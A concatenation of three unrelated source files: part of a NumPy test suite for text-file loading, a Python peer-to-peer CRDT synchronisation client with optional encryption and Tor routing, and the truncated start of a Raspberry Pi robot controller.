test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
        test = np.ndfromtxt(TextIO(data), **kwargs)
        assert_equal(test, ctrl)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
        data = "    A    B   C\n    0    1 2.3\n   45   67   9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2,3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
    # Thanks to another Windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
p2p_client.py
|
import logging
import pickle
import socket
import struct
import threading
from time import perf_counter
import socks
from crdt.ops import RemoteOp
from crdt.vector_clock import VectorClock
from network.network_client import NetworkClient, pack_and_send, recvall
from tools.connected_peers import ConnectedPeers
from tools.operation_queue import OperationQueue
from tools.operation_store import OperationStore
class CRDTP2PClient(NetworkClient):
def __init__(
self, port, op_q: OperationQueue, can_consume_sem,
puid, seen_ops_vc: VectorClock, stored_ops: OperationStore,
encrypt, known_peers, my_addr, use_tor):
super(CRDTP2PClient, self).__init__(seen_ops_vc, stored_ops, puid, encrypt)
self.connected_peers = ConnectedPeers()
self.connecting_peers = ConnectedPeers()
self.port = port
self.op_q = op_q
self.can_consume_sem = can_consume_sem
self.known_peers = known_peers
self.seen_ops_vc = seen_ops_vc
self.stored_ops = stored_ops
self.running = False
self.my_addr = my_addr
self.filename = puid
if use_tor:
socks.set_default_proxy(socks.SOCKS5, "localhost", port=9050)
self.use_tor = use_tor
self.add_peer_lock = threading.RLock()
self.time_file = '{}recv'.format(puid)
def remove_peer(self, ip, sock):
"""
Close connection to peer and note that no longer connected
"""
try:
# Send something so that the listening thread gets woken up and can close
pack_and_send('\x00', sock)
sock.close()
logging.debug('closed socket for {}'.format(ip))
except socket.error:
pass
self.connected_peers.remove_peer(ip)
def send_op(self, unpickled_op):
"""
Send operation to all connected peers
:param unpickled_op: the operation to send
"""
peers_to_remove = []
for peer_ip, peer_info in self.connected_peers.iterate():
try:
pack_and_send(unpickled_op, peer_info['sock'], peer_info['cipher'])
except socket.error:
# If fail to send, assume disconnected
logging.debug('error sending to {}, going to remove'.format(peer_ip))
peers_to_remove.append((peer_ip, peer_info['sock']))
for ip, sock in peers_to_remove:
self.remove_peer(ip, sock)
def do_p2p_protocol(self, sock, peer_ip, encrypt):
"""
(Generate key) and synchronise operations with the new peer
"""
cipher = None
try:
if encrypt:
# The application's encryption flag is set
# Returns object with encrypt()/decrypt() methods
cipher = self.do_DH(sock)
# synchronise operations
# Send your vector clock to them
self.sync_ops_req(sock, cipher)
# Receive their vector clock
# Work out set difference of yours - theirs
# Send those operations
self.sync_ops(sock, cipher)
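            # (an illustrative, dict-based sketch of this clock-diff step is
            # appended at the end of this file)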
# Note that we're connected to this peer
# And no longer in the process of connecting
self.connected_peers.add_peer(peer_ip, sock, cipher)
self.connecting_peers.remove_peer(peer_ip)
except socket.error as e:
# Communication failure, so stop trying and connect to the next peer
self.connecting_peers.remove_peer(peer_ip)
return
# Start listening for operations from this new peer
op_thread = threading.Thread(target=self.listen_for_ops,
args=(peer_ip, sock, cipher))
op_thread.daemon = True
op_thread.start()
def disconnect(self):
"""
Close connections to all peers.
        Then make a quick connection to ourselves so the listening socket stops accepting incoming connections
"""
logging.debug('disconnecting')
# MEASUREMENT
self.can_consume_sem.acquire()
for ip, val in self.connected_peers.iterate():
logging.debug('removing peer {}'.format(ip))
self.remove_peer(ip, val['sock'])
# force listening socket to close as well
s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
s.connect(("localhost", self.port))
self.running = False
s.close()
self.recvsock.close()
self.can_consume_sem.release()
def connect(self):
"""
Connect to all known addresses
"""
logging.debug('connecting')
# Force the app to stop applying operations until done connecting
self.can_consume_sem.acquire()
self.running = True
encrypt = self.encrypt
use_tor = self.use_tor
# start listening for other peers connecting
listen_thread = threading.Thread(target=self.listen_for_peers, args=(self.port, encrypt))
listen_thread.daemon = True
listen_thread.start()
for peer_addr in self.known_peers:
try:
logging.debug('trying to connect to {} out of {}'.format(peer_addr, self.known_peers))
self.add_peer_lock.acquire()
if self.connected_peers.contains(peer_addr) or (
self.connecting_peers.contains(peer_addr)):
logging.debug('already connected to {}'.format(peer_addr))
continue
if use_tor:
sock = socks.socksocket()
logging.debug('connecting to {} over Tor'.format(peer_addr + '.onion'))
sock.connect((peer_addr + '.onion', self.port))
else:
sock = socket.socket()
sock.connect((peer_addr, self.port))
logging.debug('connected to {}'.format(peer_addr))
pack_and_send(self.my_addr, sock)
self.connecting_peers.add_peer(peer_addr, sock)
except (socket.error, struct.error, socks.SOCKS5Error) as e:
logging.warning('couldn\'t connect to {}, {}'.format(peer_addr, e))
continue
finally:
self.add_peer_lock.release()
# logging.debug('released add peer lock')
self.do_p2p_protocol(sock, peer_addr, encrypt)
# MEASUREMENT
# op_thread = threading.Thread(target=self.listen_for_ops, args=(peer_addr, sock, None))
# op_thread.daemon = True
# op_thread.start()
# LENGTH_MEASUREMENT
# self.sync_ops(sock, None)
# break
# listen_thread.join()
self.can_consume_sem.release()
def listen_for_peers(self, port, encrypt):
"""
Start listening for incoming peer connections
:param port: the port to listen on
:param encrypt: Boolean whether or not to encrypt communication
"""
self.recvsock = socket.socket()
self.recvsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.recvsock.bind(('', port))
self.recvsock.listen(100)
logging.info('listening for peers on port {}'.format(port))
while self.running:
try:
logging.debug('in listening loop')
sock, _ = self.recvsock.accept()
peer_addr = recvall(sock)
logging.info('peer connected from {}'.format(peer_addr))
except (socket.error, struct.error) as e:
logging.warning('couldn\'t connect to peer, {}'.format(e))
continue
self.add_peer_lock.acquire()
if (self.connected_peers.contains(peer_addr) or (
self.connecting_peers.contains(peer_addr))) and (
peer_addr > self.my_addr
):
logging.debug('already connected to {}, dropping'.format(peer_addr))
self.add_peer_lock.release()
sock.close()
continue
self.connecting_peers.add_peer(peer_addr, sock)
self.add_peer_lock.release()
# LENGTH MEASUREMENT
self.do_p2p_protocol(sock, peer_addr, encrypt)
# self.sync_ops_req(sock, None)
# self.listen_for_ops(peer_addr, sock, None)
# return
def listen_for_ops(self, peer_ip, sock, cipher):
"""
Start receiving operations
:param peer_ip: the address to receive from
:param sock: the socket to receive on
:param cipher: the crypto object
"""
ops_done = 0
with open(self.time_file, 'w+') as f:
while True:
try:
op = recvall(sock, cipher)
logging.debug('{} got op {}'.format(self.puid, op))
f.write('{}\n'.format(perf_counter()))
ops_done += 1
if not isinstance(op, RemoteOp):
logging.warning('op {} was garbled, disconnecting from {}'.format(
op, peer_ip
))
raise socket.error('Garbled operation')
# Note that we've received this
if not (self.seen_ops_vc < op.vertex_id):
# We have seen the vertex this operation references
                        # TODO: for LSEQ ids the comparison should look at the timestamp first instead of the position
self.seen_ops_vc.update(op)
logging.debug('vc {}'.format(self.seen_ops_vc))
# add to the operation queue and signal something has been added
# MEASUREMENT
self.op_q.appendleft(op)
# MEASUREMENT
# if ops_done >= 100:
# print('finished')
# f.flush()
# self.disconnect()
# return
except (socket.error, pickle.UnpicklingError, IndexError, ValueError) as e:
logging.warning('Failed to receive op from {} {}'.format(peer_ip, e))
self.remove_peer(peer_ip, sock)
return
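# ---------------------------------------------------------------------------
# Illustrative sketch only -- not used by CRDTP2PClient.
# The sync step described in do_p2p_protocol() amounts to: exchange vector
# clocks, work out which locally stored operations the peer has not yet seen,
# and send those.  The toy helper below shows that diff with plain dicts; the
# real client uses the VectorClock and OperationStore classes imported above,
# whose actual APIs may differ from this simplified version.
# ---------------------------------------------------------------------------
def _ops_missing_at_peer(my_ops_by_author, peer_clock):
    """Return the operations a peer still needs.
    my_ops_by_author: {author_id: [op, op, ...]} in causal order.
    peer_clock:       {author_id: number_of_ops_already_seen}.
    """
    missing = []
    for author, ops in my_ops_by_author.items():
        seen = peer_clock.get(author, 0)
        # everything past the peer's last-seen counter still has to be sent
        missing.extend(ops[seen:])
    return missing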
|
pinobot.py
|
#!/usr/bin/python3
from modules.pino_boot_loader import PinoBootLoader
import time, threading, logging
from logging.handlers import RotatingFileHandler
from enum import Enum
from google.api_core.exceptions import Unknown
class PinoState(Enum):
IDLE = 0
SENSOR_ON =1
STILL_ON = 2
SENSOR_OFF = 3
LISTEN_SUCCESS = 11
LISTEN_FAIL = 12
LISTEN_CLOUD_ERROR = 13
UART_ON = 20
DO_SOMETHING = 30
#GO_SLEEP = 4
#WAKEP_UP = 5
class PinoBot:
"""
Description:
pinobot main module
-
    Summary of Class
    1. setup(self):
        set logging and boot pinobot
    2. update(self):
        read hardware and update PinoBot's state
    3. listen(self):
        start audio recording/streaming and return the DialogFlow response;
        if a Google Cloud error occurs, display it on the OLED
    4. start_say(self, response):
        speak the TTS audio contained in the response (threaded)
    5. start_act(self, response):
        run the hardware actions given by response.action_cmd (threaded)
    6. wait_say_and_act(self, timeout=30):
        block until the say/act threads finish or the timeout expires
    7. call_uart_event(self):
        if PinoBot's UART received a message,
        use it to call the matching DialogFlow event
    8. call_intent(self, text="", event_name="", event_parameter=None):
        call DialogFlow manually with text or an event, and get the response
    9. return_idle(self):
        show the idle message and reset the state to IDLE
    A minimal usage sketch appears at the end of this file.
"""
def __init__(self,base_path ="/home/pi/Desktop/PinoBot/"):
# 0. Argument
# 1. Static Variables
# 2. variables
self.cur_volume = 0 # current speaker volume rate [ 0 ~ 10 ]
        self.detect = {
            "pre_state": 0,  # last sensor state, 1: object present, 0: absent
            "distance": 30,  # cm, sonic-sensor threshold for switching between 1 and 0
            "first_time": time.time(),  # sec, time the sonic sensor first detected an object
        }
self.base_path = base_path
self.state = PinoState.IDLE
# 3. Objects
self.hardware = None
self.cloud = None
self.config = None
self.log = None
self.response = None
self.uart_cmd = None
# threads
self.say_thread = None
self.act_thread = None
# 4. Run setup
self.setup()
def setup(self):
"""
Description
-----------
set logging and boot pinobot
"""
# 1. init log
path = self.base_path + "/main.log"
self.log = logging.getLogger("Main")
self.log.setLevel(logging.DEBUG)
formatter = logging.Formatter(
"[%(levelname)s] (%(asctime)s : %(filename)s:%(lineno)d) > %(message)s"
)
log_file = RotatingFileHandler(
filename=path, maxBytes=5 * 1024 * 1024, mode="w", encoding="utf-8"
)
log_file.setFormatter(formatter)
self.log.addHandler(log_file)
log_console = logging.StreamHandler()
log_console.setFormatter(formatter)
self.log.addHandler(log_console)
self.log.info("[PinoBot] Start Boot")
boot = PinoBootLoader(self.base_path,self.log)
# 2. run boot sequence
self.hardware, self.cloud, self.config = boot.boot()
del boot
self.log.info("[PinoBot] Boot Done..")
def update(self):
"""
Description
-----------
read hardware and update PinoBot's State
Notes
-----
State : PinoState
priority [1] : Serial command
priority [2] : ultrasonic sensor state
If the ultrasonic sensor and uart command come in at the same time,
the uart command is given priority.
"""
# 2. read hardware signals
cur_sensor_state = 0
distance,uart_cmd = self.hardware.read()
if self.detect["distance"] > distance > 4:
cur_sensor_state = 1
# 3. uart command on
if uart_cmd is not None:
self.uart_cmd = uart_cmd
self.state = PinoState.UART_ON
print("uart : ",self.uart_cmd)
return self.state
# 4. set state by sensor
if self.detect["pre_state"] == 0 and cur_sensor_state == 1:
# 4.1 object [ 0 -> 1 ] , new object, add talk task
self.detect["first_time"] = time.time()
self.state = PinoState.SENSOR_ON
elif self.detect["pre_state"] == 1 and cur_sensor_state == 1:
# 4.2 object [ 1 -> 1 ] , object still in
self.state = PinoState.STILL_ON
elif self.detect["pre_state"] == 1 and cur_sensor_state == 0:
# 4.3 object [ 1 -> 0 ] , object gone
